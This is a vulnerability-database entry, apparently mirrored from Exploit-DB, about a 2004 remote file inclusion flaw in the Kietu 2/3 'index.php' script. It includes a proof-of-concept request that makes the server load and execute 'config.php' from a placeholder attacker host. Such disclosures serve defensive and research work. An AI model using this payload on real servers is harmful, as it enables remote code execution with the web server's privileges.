https://www.exploit-db.com/exploits/23607
Kietu 2/3 - 'index.php' Remote File Inclusion






漏洞ID | 1054378 | 漏洞类型 | |
发布时间 | 2004-01-26 | 更新时间 | 2004-01-26 |
![]() |
N/A | ![]() |
N/A |
漏洞平台 | PHP | CVSS评分 | N/A |
|漏洞来源
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/9499/info
A flaw exists in the Kietu 'index.php' script that may permit remote attackers to include malicious remote files. Remote users may influence the include path for the 'config.php' configuration file, which may result in execution of arbitrary commands with the privileges of the webserver process.
Issuing the URI request to the vulnerable server will facilitate remote attacker php script execution:
http://www.example.com/index.php?kietu[url_hit]=http://[attacker]/
Where the 'config.php' file must exist:
http://[attacker]/config.php
检索漏洞
开始时间
结束时间